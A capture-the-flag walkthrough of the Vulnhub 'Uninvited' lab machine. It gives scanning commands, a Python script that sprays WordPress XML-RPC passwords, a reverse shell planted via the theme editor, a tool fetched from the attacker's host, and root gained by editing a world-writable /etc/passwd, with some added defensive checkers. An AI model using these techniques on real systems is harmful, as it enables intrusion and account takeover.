
Uninvited Writeup [Vulnhub]

Uninvited is a machine from Vulnhub with a difficulty between intermediate and hard according to its creator. It consists of enumerating and brute-forcing WordPress to gain initial access; then, taking advantage of a backdoor, we escape the Docker container; and finally we abuse misconfigured file permissions on /etc/passwd to obtain root.

Enumeration

As this machine is from Vulnhub, we first perform a ping sweep to find which IP on our local network has been assigned to the box.

The simple bash script is the following:

#!/bin/bash
# Ping sweep: send one ICMP echo to every host of a /24 and print the ones that answer.
# Usage: ./pingsweep.sh 192.168.100
if [ "$1" == "" ]
then
    echo "You forgot an IP address!"
    echo "Syntax: ./pingsweep.sh 192.168.1"
else
    for ip in $(seq 1 254); do
        # run the probes in parallel; keep only the responding address
        ping -c 1 "$1.$ip" | grep "64 bytes" | cut -d " " -f 4 | tr -d ":" &
    done
    wait   # let the background pings finish before the script exits
fi

Running it we find this machine's IP is 192.168.100.18:

noxious@kali:~/Desktop$ ./pingsweep.sh 192.168.100
192.168.100.8
192.168.100.10
192.168.100.14
192.168.100.1
192.168.100.18

Now we can run nmap to find which ports are open:

nmap -p- 192.168.100.18
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-20 13:28 CEST
Nmap scan report for 192.168.100.18
Host is up (0.019s latency).
Not shown: 65531 closed ports
PORT      STATE    SERVICE
80/tcp    open     http
7894/tcp  open     unknown
11566/tcp filtered unknown
60000/tcp open     unknown

And we run the default scripts and version detection on the non-standard ports:

nmap -sC -sV -p 7894,11566,60000 192.168.100.18
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-20 14:00 CEST
Nmap scan report for 192.168.100.18
Host is up (0.052s latency).

PORT      STATE  SERVICE VERSION
7894/tcp  open   ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 af:d2:42:e4:31:ff:4f:fb:0b:de:18:e9:3f:c4:bc:42 (RSA)
|   256 97:56:47:40:ea:99:b2:a6:1a:a5:59:56:7e:2b:b4:a0 (ECDSA)
|_  256 b2:b1:67:44:75:f6:d8:32:a2:f2:ff:7f:09:a7:7d:53 (ED25519)
11566/tcp closed unknown
60000/tcp open   http    Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.4.2
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: UNINVITED
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Browsing to port 80 we find the following site:

[screenshot: site on port 80]

Inspecting its source code we find a base64-encoded comment:

[screenshot: base64 string inside an HTML comment in the page source]

Next we decode it:

echo "WWVhaCEgSSBrbm93IGl0IGhhcHBlbnMuLi4gSSBndWVzcyB1IG1pZ2h0IHdhbnQgdG8gYWRkIHRoaXMgW2ZpZWxkZm9yY2VdIHRvIHlvdXIgaG9zdHM=" | base64 -d
Yeah! I know it happens... I guess u might want to add this [fieldforce] to your hosts

So we add fieldforce to /etc/hosts (pointing at 192.168.100.18) and access the virtual host on port 60000:

[screenshot: WordPress site at http://fieldforce:60000/]

Running gobuster to enumerate hidden directories we get /backdoor, which returns a 302 redirect to the WordPress login page:

gobuster dir -u http://fieldforce:60000/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 200 -q
/wp-content (Status: 301)
/h (Status: 301)
/atom (Status: 200)
/rss2 (Status: 200)
/wp-includes (Status: 301)
/sa (Status: 301)
/rdf (Status: 200)
/sample (Status: 301)
/page1 (Status: 200)
/' (Status: 301)
/he (Status: 301)
/%20 (Status: 301)
/sam (Status: 301)
/hello (Status: 301)
/2020 (Status: 301)
/wp-admin (Status: 301)
/backdoor (Status: 302)
/0000 (Status: 301)

[screenshot: WordPress login page reached via /backdoor]

As the site is running WordPress, we can use cewl to build a custom wordlist from the site's own text and then brute-force the login with wpscan, which enumerates the users and tries each word against them over XML-RPC:

cewl http://fieldforce:60000/ --with-numbers -d 2 -m 4 -w wordlist.txt

wpscan --url http://fieldforce:60000/ -P Desktop/wordlist.txt


[+] Performing password attack on Xmlrpc against 2 user/s
[SUCCESS] - elliot / wh1ter0se                                                                                             
[SUCCESS] - Elliot / wh1ter0se                                                                                             
Trying Elliot / wh1ter0se Time: 00:00:35 <======================                      > (1918 / 3836) 50.00%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: elliot, Password: wh1ter0se
 | Username: Elliot, Password: wh1ter0se

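To make clear what wpscan is doing in the run above, here is an added Python example (not part of the original writeup or of wpscan) of the XML-RPC password check it performs: each attempt is a wp.getUsersBlogs call to /xmlrpc.php, a 403 fault means wrong credentials, a 405 fault means XML-RPC is disabled, and a blog list means a hit. The fake_wordpress function is a constructed stand-in for the target so the script runs offline; the account and site names in it come from the results above.

```python
import xmlrpc.client
from typing import Callable, Iterable

METHOD = "wp.getUsersBlogs"  # authenticated call abused for password checks


def build_request(username: str, password: str) -> bytes:
    """Body of one login attempt as POSTed to /xmlrpc.php."""
    return xmlrpc.client.dumps((username, password), methodname=METHOD).encode()


def classify_response(body: bytes) -> str:
    """'valid' (blog list returned), 'invalid' (403 fault) or 'blocked' (405 fault)."""
    try:
        xmlrpc.client.loads(body)  # raises Fault for a <fault> response
    except xmlrpc.client.Fault as fault:
        if fault.faultCode == 403:
            return "invalid"
        if fault.faultCode == 405:
            return "blocked"
        return "fault:%d" % fault.faultCode
    return "valid"


def spray(users: Iterable[str], words: Iterable[str],
          send: Callable[[bytes], bytes]) -> list:
    """Try every user/word pair; stop for a user once a password is found."""
    hits = []
    words = list(words)
    for user in users:
        for word in words:
            verdict = classify_response(send(build_request(user, word)))
            if verdict == "blocked":
                raise RuntimeError("xmlrpc.php is disabled; fall back to wp-login.php")
            if verdict == "valid":
                hits.append((user, word))
                break
    return hits


# Constructed stand-in for the target (assumption: this is not the real site).
ACCOUNTS = {"elliot": "wh1ter0se"}  # WordPress matches usernames case-insensitively


def fake_wordpress(request: bytes) -> bytes:
    """Answer like WordPress 5.x does: blog list on success, 403 fault otherwise."""
    (user, password), method = xmlrpc.client.loads(request)
    if method != METHOD:
        fault = xmlrpc.client.Fault(-32601, "server error. requested method not found")
        return xmlrpc.client.dumps(fault, methodresponse=True).encode()
    if ACCOUNTS.get(user.lower()) == password:
        blogs = [{"isAdmin": True, "blogid": "1", "blogName": "UNINVITED",
                  "url": "http://fieldforce:60000/",
                  "xmlrpc": "http://fieldforce:60000/xmlrpc.php"}]
        return xmlrpc.client.dumps((blogs,), methodresponse=True).encode()
    fault = xmlrpc.client.Fault(403, "Incorrect username or password.")
    return xmlrpc.client.dumps(fault, methodresponse=True).encode()


if __name__ == "__main__":
    print(spray(["elliot", "Elliot"], ["fsociety", "mrrobot", "wh1ter0se"], fake_wordpress))
```

Against a real target, send would be a function that POSTs the bytes to http://fieldforce:60000/xmlrpc.php and returns the response body. The same classification explains the defence: disabling XML-RPC (the 405 branch) or rate-limiting xmlrpc.php turns this attack off, while wp-login.php remains the slower fallback.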
Now, with this set of credentials, we can log in to the site:

[screenshot: WordPress dashboard after logging in as elliot]

Exploitation

We can get a reverse shell through Appearance > Theme Editor: we edit the 404.php template of a non-active theme such as Twenty Nineteen and replace its contents with a PHP reverse shell pointing at our listener (192.168.100.10:443). Editing an inactive theme avoids breaking the live site while we work. This is exactly what define('DISALLOW_FILE_EDIT', true); in wp-config.php prevents, so an administrator who wants to stop stolen credentials from turning into code execution should set it.

[screenshot: Theme Editor with the PHP reverse shell pasted into 404.php]

Afterwards, we activate that theme and trigger the shell by requesting a page that does not exist, which makes WordPress render the theme's 404 template:

curl http://fieldforce:60000/404.php

Obtaining a reverse connection as www-data:

nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.100.10] from (UNKNOWN) [192.168.100.18] 45660
Linux f950b9c50e1d 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64 GNU/Linux
 14:18:10 up 17 min,  0 users,  load average: 0.07, 0.06, 0.06
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

After upgrading the shell, the hex hostname (f950b9c50e1d) tells us we are inside a Docker container. Looking around, we discover a note in /home/demodocker/.local that contains a hint, base64-encoded twice:

www-data@f950b9c50e1d:/home/demodocker/.local$ cat note.txt
ZW5jb2RlZCB0d2ljZSBMUzB0YVhBdExTMHZabk52WTJsbGRIa3VaWGhs
www-data@f950b9c50e1d:/home/demodocker/.local$ echo "ZW5jb2RlZCB0d2ljZSBMUzB0YVhBdExTMHZabk52WTJsbGRIa3VaWGhs" | base64 -d
encoded twice LS0taXAtLS0vZnNvY2lldHkuZXhl
www-data@f950b9c50e1d:/home/demodocker/.local$ echo "LS0taXAtLS0vZnNvY2lldHkuZXhl" | base64 -d
---ip---/fsociety.exewww-data@f950b9c50e1d:/home/demodocker/.local$
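The container check above rests on a single clue, the hostname. As an added example that is not part of the original writeup, the Python below gathers the usual Docker indicators (/.dockerenv, the cgroup path, the bind-mount source in mountinfo and the 12-hex-character hostname) and can be fed either the live files or constructed data; the sample strings are made up, modelled on this box, with the 64-character ids padded with zeros.

```python
import os
import re
import socket

# Container ids appear as /docker/<id> (cgroup v1) or /docker/containers/<id> (mountinfo)
CONTAINER_ID = re.compile(r"/docker/(?:containers/)?([0-9a-f]{12,64})")


def container_indicators(cgroup_text: str, mountinfo_text: str,
                         dockerenv_present: bool, hostname: str) -> list:
    """Return human-readable reasons a shell looks like it runs inside a Docker container.

    Inputs mirror /proc/1/cgroup, /proc/self/mountinfo, /.dockerenv and the hostname,
    passed in as values so the logic can be exercised on constructed data.
    """
    reasons = []
    if dockerenv_present:
        reasons.append("/.dockerenv exists")
    # cgroup v1: lines such as "12:pids:/docker/<64-hex id>"
    m = CONTAINER_ID.search(cgroup_text)
    if m:
        reasons.append("docker cgroup path in /proc/1/cgroup (id %s)" % m.group(1)[:12])
    # cgroup v2 hides the path, but /etc/hostname and /etc/hosts are still bind-mounted
    # from /var/lib/docker/containers/<id>/ and that source path shows up in mountinfo
    m = CONTAINER_ID.search(mountinfo_text)
    if m:
        reasons.append("container id in /proc/self/mountinfo (id %s)" % m.group(1)[:12])
    # Docker sets the hostname to the first 12 hex characters of the container id
    if re.fullmatch(r"[0-9a-f]{12}", hostname):
        reasons.append("hostname %s looks like a container id" % hostname)
    return reasons


def read_live_indicators() -> list:
    """Collect the same evidence from the running system (unreadable files count as empty)."""
    def slurp(path):
        try:
            with open(path) as fh:
                return fh.read()
        except OSError:
            return ""
    return container_indicators(slurp("/proc/1/cgroup"), slurp("/proc/self/mountinfo"),
                                os.path.exists("/.dockerenv"), socket.gethostname())


# Constructed sample (assumption: shaped like this box's files, not copied from it).
SAMPLE_CGROUP = ("12:pids:/docker/f950b9c50e1d" + "0" * 52 + "\n"
                 "11:memory:/docker/f950b9c50e1d" + "0" * 52 + "\n")
SAMPLE_MOUNTINFO = ("1234 1200 8:1 /var/lib/docker/containers/f950b9c50e1d" + "0" * 52 +
                    "/hostname /etc/hostname rw,relatime - ext4 /dev/sda1 rw\n")

if __name__ == "__main__":
    for reason in container_indicators(SAMPLE_CGROUP, SAMPLE_MOUNTINFO, True, "f950b9c50e1d"):
        print("[+]", reason)
    print("live:", read_live_indicators())
```

None of these indicators is proof on its own (a host can be given a hex hostname, /.dockerenv can be removed), which is why the function returns the whole list rather than a yes/no.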

The placeholder ---ip--- stands for the target's address, so we download that file from the web server on port 80 with wget:

wget 192.168.100.18/fsociety.exe

As it is a Windows executable, we can run it with wine. The program asks for a set of credentials which, following the machine's theme, are trivial to guess (elliot / mrrobot):

root@kali:/home/noxious/Downloads# wine fsociety.exe
WELCOME TO BACKDOOR

-------------------
+++++++++++++++++++
===================


USERNAME : elliot
PASSWORD : mrrobot
===================

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
User has been identified, Welcome elliot
###############################################################

TH3 H!N7

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Do you know python-reverse-shell client/server socket program?

If IP_Address is 172.18.0.2, use port 9999

If IP_Address is 172.18.0.3, use port 8888

Remember 'PATIENCE' is the KEY
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Press Enter!

We check the container's IP (172.18.0.3, so port 8888 applies) and, as netcat is not available in the container, we upload a static nc binary from our attacking machine:

www-data@f950b9c50e1d:/tmp$ ifconfig | grep 172.18.0
        inet 172.18.0.3  netmask 255.255.0.0  broadcast 172.18.255.255
www-data@f950b9c50e1d:/tmp$ which nc
www-data@f950b9c50e1d:/tmp$ wget http://192.168.100.10/nc

Then we start a listener on port 8888 inside the container and wait (the 'PATIENCE' hint); after a while the Docker host, 172.18.0.1, connects back and we get a shell as docksec:

www-data@f950b9c50e1d:/tmp$ ./nc -lvnp 8888
listening on [any] 8888 ...
connect to [172.18.0.3] from (UNKNOWN) [172.18.0.1] 59106

/home/docksec> id
uid=1001(docksec) gid=1001(docksec) groups=1001(docksec)

The first flag can be read:

/home/docksec> ls
user1.txt
/home/docksec> cat user1.txt
 _______ __   __ ___ ___     _______
|       |  |_|  |   |   |   |       |
|  _____|       |   |   |   |    ___|
| |_____|       |   |   |   |   |___
|_____  |       |   |   |___|    ___|
 _____| | ||_|| |   |       |   |___
|_______|_|   |_|___|_______|_______|


FLAG{DASDGFGPXLCKDEG5D7635CSDAFDIMMJDSUWEQDSADIG}

The session we obtained closes as soon as we run a cd command, so instead we read docksec's private SSH key to get a more stable shell:

/home/docksec> cat .ssh/id_rsa

We save the key locally with mode 600 and log in over SSH, which on this box is running on port 7894:

ssh docksec@192.168.100.18 -i id_rsa -p 7894

Privilege Escalation

Enumerating the host we see that /etc/passwd is world-writable:

docksec@uninvited:~$ ls -la /etc/passwd
-rwxrwxrwx 1 777 root 1628 Sep 20 22:29 /etc/passwd

So we can generate a password hash with openssl passwd and, with a text editor such as nano, put it in root's password field in place of the x. When that field holds a hash instead of x, authentication uses /etc/passwd directly and /etc/shadow is ignored for that account:

openssl passwd noxious
EfsRhwv.xHlkw
docksec@uninvited:~$ cat /etc/passwd | head -n 1
root:EfsRhwv.xHlkw:0:0:root:/root:/bin/bash
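From the defender's side, this is a cheap thing to audit. As an added example that is not part of the original writeup, the Python below checks a passwd file for the traces this technique leaves (a hash where the x should be, an empty password field, an extra uid 0 account) and flags group- or world-writable permissions on the file itself. The sample content is constructed, with root's line taken from the output above.

```python
import os
import stat

# Values that legitimately appear in the password field of /etc/passwd
SHADOW_MARKERS = ("x", "*", "!", "!!")


def audit_passwd(text: str) -> list:
    """Return (line number, message) pairs for suspicious /etc/passwd entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, "malformed entry: %r" % line))
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        if pw == "":
            # empty field means "no password needed" for this account
            findings.append((lineno, "%s: empty password field" % name))
        elif pw not in SHADOW_MARKERS:
            # a hash here wins over /etc/shadow, which is how the passwd write became root
            findings.append((lineno, "%s: password hash stored in passwd, bypasses /etc/shadow" % name))
        if uid == "0" and name != "root":
            findings.append((lineno, "%s: extra uid-0 account" % name))
    return findings


def audit_mode(mode: int) -> list:
    """Flag a passwd file that anyone but root can modify (expected mode is 0644)."""
    findings = []
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("/etc/passwd writable by group or others (mode %o)" % (mode & 0o777))
    return findings


# Constructed sample (assumption: only root's line mirrors the box above).
SAMPLE = """root:EfsRhwv.xHlkw:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
docksec:x:1001:1001::/home/docksec:/bin/bash
toor::0:0::/root:/bin/bash
"""

if __name__ == "__main__":
    for lineno, msg in audit_passwd(SAMPLE):
        print("sample line %d: %s" % (lineno, msg))
    # Same checks against the live system
    with open("/etc/passwd") as fh:
        for lineno, msg in audit_passwd(fh.read()):
            print("/etc/passwd line %d: %s" % (lineno, msg))
    for msg in audit_mode(os.stat("/etc/passwd").st_mode):
        print(msg)
```

Run it from cron or a host-based agent and alert on any output; on a clean Ubuntu box both checks return nothing.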

Finally we can switch to root with our password and read the root flag:

docksec@uninvited:~$ su root
Password:
root@uninvited:/home/docksec# cat /root/root.txt
.__            .__  __             .___
__ __  ____ |__| _______  _|___/  |_  ____   __| _/
|  |  \/    \|  |/    \  \/ |  \   ___/ __ \ / __ |  
|  |  |   |  |  |   |  \   /|  ||  | \  ___// /_/ |  
|____/|___|  |__|___|  /\_/ |__||__|  \___  \____ |  
\/        \/                   \/     \/
FLAG{58DSFJ74RFWESD8J2LKJGHJ87ER4QREWRFLMSTDCMGKAASD}

That leaves the Docker flag (user2.txt inside the WordPress container), which we can now read from the host since we have root.

First we list docker containers:

root@uninvited:~# docker container list
CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS                   NAMES
f950b9c50e1d        wordpress:latest    "docker-entrypoint.s…"   7 weeks ago         Up 29 minutes       0.0.0.0:60000->80/tcp   wordpress_wordpress_1_dd9b95034d3d
982523fa9f5f        mysql:5.7           "docker-entrypoint.s…"   7 weeks ago         Up 29 minutes       3306/tcp, 33060/tcp     wordpress_db_1_9676244bc9b2

Now we can exec into the WordPress container and cat the flag:

root@uninvited:~# docker exec wordpress_wordpress_1_dd9b95034d3d cat /home/demodocker/user2.txt
   ___  ____  _______ __
  /  _]/    |/ ___/  |  |
 /  [_|  o  (   \_|  |  |
|    _]     |\__  |  ~  |
|   [_|  _  |/  \ |___, |
|     |  |  |\    |     |
|_____|__|__| \___|____/   RIGHT ????????                     


FLAG{FPDSNRWEBT513SDASDHTYHMDSARTSIJO32SDFH}

This post is licensed under CC BY 4.0 by the author.